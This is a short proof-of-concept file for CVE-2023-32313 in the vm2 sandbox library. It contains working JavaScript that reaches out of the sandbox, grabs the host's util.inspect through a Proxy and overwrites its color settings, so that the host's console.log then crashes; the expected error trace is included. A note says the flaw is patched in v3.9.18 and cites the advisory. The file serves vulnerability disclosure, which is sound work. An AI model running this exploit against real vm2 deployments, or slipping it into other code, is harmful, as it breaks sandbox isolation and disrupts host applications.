PoC for breaking console.log in [email protected] - CVE-2023-32313

test.js

const { VM } = require("vm2");
const vm = new VM();

const code = `
  let proxiedInspect;

  const source = new Proxy(() => {}, {
    get: function (target, prop, receiver) {
      if (prop === Symbol.for("nodejs.util.inspect.custom")) {
        // https://github.com/nodejs/node/blob/v20.1.0/lib/internal/util/inspect.js#L805-L811
        return function (depth, options, inspect) {
          proxiedInspect = inspect;
        };
      }
      return Reflect.get(...arguments);
    },
  });
  try {
    Buffer.prototype.copy.bind(source)({});
    // Here, util.inspect is called:
    // https://github.com/nodejs/node/blob/v20.1.0/lib/buffer.js#L209
    // https://github.com/nodejs/node/blob/v20.1.0/lib/internal/errors.js#L1277
    // https://github.com/nodejs/node/blob/v20.1.0/lib/internal/errors.js#L890-L891
  } catch {}

  // Break util.inspect.colors of the host context
  for (const key in proxiedInspect.colors) {
    proxiedInspect.colors[key] = [{ toString: 1 }];
  }
`;

vm.run(code);

console.log(1); // Cause an error!
/*
  node:internal/util/inspect:565
        return `\u001b[${color[0]}m${str}\u001b[${color[1]}m`;
                              ^

  TypeError: Cannot convert object to primitive value
      at stylizeWithColor (node:internal/util/inspect:565:29)
      at formatNumber (node:internal/util/inspect:1590:12)
      at formatPrimitive (node:internal/util/inspect:1645:12)
      at formatValue (node:internal/util/inspect:770:12)
      at inspect (node:internal/util/inspect:364:10)
      at formatWithOptionsInternal (node:internal/util/inspect:2298:40)
      at formatWithOptions (node:internal/util/inspect:2160:10)
      at console.value (node:internal/console/constructor:339:14)
      at console.log (node:internal/console/constructor:376:61)
      at Object.<anonymous> (... snip ...)

  Node.js v20.1.0
 */

This vulnerability was patched at v3.9.18:

• GHSA-p5gc-c584-jj6v